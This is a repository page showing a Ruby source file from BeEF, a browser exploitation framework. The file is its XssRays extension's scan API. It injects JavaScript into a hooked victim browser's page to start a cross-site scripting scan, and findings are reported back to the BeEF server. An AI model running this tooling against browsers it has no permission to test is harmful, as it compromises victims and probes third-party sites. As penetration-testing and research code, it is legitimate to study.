Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
cf01bb3b63449ccb22d6a5b5dfd7b45243b01437
beef/extensions/xssrays/api/scan.rb
antisnatchor b90ddd367d Issue 384: First draft of XssRays (extension) 
git-svn-id: https://beef.googlecode.com/svn/trunk@1110 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-07-26 18:32:14 +00:00

68 lines
2.3 KiB
Ruby
Raw Blame History

#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Xssrays
module API
class Scan
include BeEF::Core::Handlers::Modules::BeEFJS
#
# Add the xssrays mian JS file to the victim DOM if there is a not started scan entry in the db.
#
def start_scan(hb, body)
@body = body
hb = BeEF::Core::Models::HookedBrowser.first(:id => hb.id)
#TODO: we should get the xssrays_scan table with more accuracy, if for some reasons we requested
#TODO: 2 scans on the same hooked browsers, "first" could not get the right result we want
xs = BeEF::Core::Models::Xssraysscan.first(:hooked_browser_id => hb.id, :is_started => false)
# stop here if there are no XssRays scans to be started
return if xs == nil || xs.is_started == true
# set the scan as started
xs.update(:is_started => true)
# build the beefjs xssrays component
build_missing_beefjs_components 'beef.net.xssrays'
# the URI of the HTTP controller where rays should come back if the vulnerability is verified
beefurl = "#{BeEF::Core::Server.instance.url}/ui/xssrays/rays"
#TODO: this must be configurable is some ways, through the web UI
cross_domain = true
timeout = 5000
@body << %Q{
beef.execute(function() {
beef.net.xssrays.startScan('#{xs.id}', '#{hb.session}', '#{beefurl}', #{cross_domain}, #{timeout});
});
}
print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}]")
end
end
end
end
end
end
Reference in New Issue View Git Blame Copy Permalink